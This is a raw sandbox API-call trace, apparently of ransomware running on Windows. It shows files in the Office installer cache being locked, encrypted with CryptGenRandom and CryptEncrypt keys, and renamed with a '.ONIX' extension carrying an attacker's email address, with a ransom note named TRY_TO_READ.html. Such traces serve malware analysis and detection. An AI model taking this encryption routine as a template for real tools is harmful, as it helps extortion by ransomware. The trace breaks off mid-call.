[0110.057] WriteFile (in: hFile=0x490, lpBuffer=0x367f448*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x367f448*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0110.058] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x2b30020 | out: hHeap=0x410000) returned 1 [0110.062] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x3680020 | out: hHeap=0x410000) returned 1 [0110.067] UnlockFile (hFile=0x490, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xd49ee31, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0110.067] CloseHandle (hObject=0x490) returned 1 [0110.068] GetProcessHeap () returned 0x410000 [0110.068] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0110.068] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0110.070] GetProcessHeap () returned 0x410000 [0110.070] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0110.070] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0110.070] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0110.070] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0110.070] FindNextFileW (in: hFindFile=0x48ec70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec13c00, ftCreationTime.dwHighDateTime=0x1cac15b, ftLastAccessTime.dwLowDateTime=0xbec13c00, ftLastAccessTime.dwHighDateTime=0x1cac15b, ftLastWriteTime.dwLowDateTime=0x1682d290, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x150578, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="setup.exe", cAlternateFileName="")) returned 1 [0110.070] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0110.070] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0110.071] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4589f0 [0110.071] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0110.071] GetLastError () returned 0x0 [0110.071] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x490 [0110.071] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0110.071] LockFile (hFile=0x490, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x150578, nNumberOfBytesToLockHigh=0x0) returned 1 [0110.071] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0110.071] ReadFile (in: hFile=0x490, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0110.073] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0110.073] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0110.073] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0110.073] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0110.073] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe", dwFileAttributes=0x80) returned 1 [0110.073] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 73 [0110.073] GetProcessHeap () returned 0x410000 [0110.073] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x102) returned 0x467908 [0110.073] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" [0110.073] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0110.073] GetFileSizeEx (in: hFile=0x490, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=1377656) returned 1 [0110.074] SetFilePointer (in: hFile=0x490, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x150578 [0110.074] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0110.074] GetProcessHeap () returned 0x410000 [0110.074] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0110.074] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0110.074] WriteFile (in: hFile=0x490, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0110.075] WriteFile (in: hFile=0x490, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0110.076] WriteFile (in: hFile=0x490, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0110.078] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x150578) returned 0x2b30020 [0110.078] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x150578) returned 0x3680020 [0110.078] SetFilePointer (in: hFile=0x490, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.078] ReadFile (in: hFile=0x490, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x150578, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x150578, lpOverlapped=0x0) returned 1 [0110.205] UnlockFile (hFile=0x490, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x150578, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0110.205] CloseHandle (hObject=0x490) returned 1 [0110.206] GetProcessHeap () returned 0x410000 [0110.206] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0110.206] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0110.215] GetProcessHeap () returned 0x410000 [0110.215] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0110.215] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0110.215] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0110.215] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0110.215] FindNextFileW (in: hFindFile=0x48ec70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x18177c50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x7976, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0110.215] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0110.215] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0110.215] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4589f0 [0110.215] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0110.215] GetLastError () returned 0x0 [0110.215] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x490 [0110.216] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0110.216] LockFile (hFile=0x490, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x7976, nNumberOfBytesToLockHigh=0x0) returned 1 [0110.216] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0110.216] ReadFile (in: hFile=0x490, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0110.217] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0110.217] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0110.218] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0110.218] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0110.218] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0110.218] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 73 [0110.218] GetProcessHeap () returned 0x410000 [0110.218] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x102) returned 0x467908 [0110.218] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" [0110.218] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0110.218] GetFileSizeEx (in: hFile=0x490, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=31094) returned 1 [0110.218] SetFilePointer (in: hFile=0x490, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x7976 [0110.218] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0110.218] GetProcessHeap () returned 0x410000 [0110.218] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0110.218] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0110.219] WriteFile (in: hFile=0x490, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0110.220] WriteFile (in: hFile=0x490, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0110.221] WriteFile (in: hFile=0x490, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0110.222] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x7976) returned 0x4d8b68 [0110.222] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x7976) returned 0x4e04e8 [0110.222] SetFilePointer (in: hFile=0x490, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.222] ReadFile (in: hFile=0x490, lpBuffer=0x4d8b68, nNumberOfBytesToRead=0x7976, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8b68*, lpNumberOfBytesRead=0x367f44c*=0x7976, lpOverlapped=0x0) returned 1 [0110.223] SetFilePointer (in: hFile=0x490, lDistanceToMove=-31094, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.223] WriteFile (in: hFile=0x490, lpBuffer=0x4e04e8*, nNumberOfBytesToWrite=0x7976, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e04e8*, lpNumberOfBytesWritten=0x367f44c*=0x7976, lpOverlapped=0x0) returned 1 [0110.225] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8b68 | out: hHeap=0x410000) returned 1 [0110.225] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4e04e8 | out: hHeap=0x410000) returned 1 [0110.225] UnlockFile (hFile=0x490, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x7976, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0110.225] CloseHandle (hObject=0x490) returned 1 [0110.226] GetProcessHeap () returned 0x410000 [0110.226] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0110.226] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0110.228] GetProcessHeap () returned 0x410000 [0110.228] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0110.228] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0110.228] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0110.228] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0110.228] FindNextFileW (in: hFindFile=0x48ec70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30c684f0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30c684f0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30c684f0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0110.228] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0110.228] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0110.228] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4589f0 [0110.228] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0110.228] GetLastError () returned 0x0 [0110.228] FindNextFileW (in: hFindFile=0x48ec70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30c684f0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30c684f0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30c684f0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0110.228] CloseHandle (hObject=0x3cc) returned 1 [0110.228] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0110.228] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x31, wMilliseconds=0x25b)) [0110.228] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0110.229] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0110.229] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0110.229] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C9c354ca09c354b444c.lock") returned 86 [0110.229] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C9c354ca09c354b444c.lock" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0110.229] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0110.229] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0110.230] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x90) returned 0x43e3f8 [0110.230] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0110.230] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458a78 | out: hHeap=0x410000) returned 1 [0110.230] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f720 | out: hHeap=0x410000) returned 1 [0110.230] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0x30c684f0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30c684f0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48ecb0 [0110.230] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0110.230] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0110.230] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458a78 [0110.230] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0110.230] GetLastError () returned 0x0 [0110.230] FindNextFileW (in: hFindFile=0x48ecb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0x30c684f0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30c684f0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.230] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0110.230] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0110.230] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458a78 [0110.230] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0110.230] GetLastError () returned 0x0 [0110.230] FindNextFileW (in: hFindFile=0x48ecb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x87078450, ftCreationTime.dwHighDateTime=0x1cb147f, ftLastAccessTime.dwLowDateTime=0x87078450, ftLastAccessTime.dwHighDateTime=0x1cb147f, ftLastWriteTime.dwLowDateTime=0xa5d1e590, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0110.230] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0110.230] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0110.230] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458a78 [0110.230] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0110.230] GetLastError () returned 0x0 [0110.230] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x494 [0110.231] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0110.231] LockFile (hFile=0x494, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1e6600, nNumberOfBytesToLockHigh=0x0) returned 1 [0110.231] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0110.231] ReadFile (in: hFile=0x494, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0110.233] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0110.233] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0110.233] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0110.233] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0110.233] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All 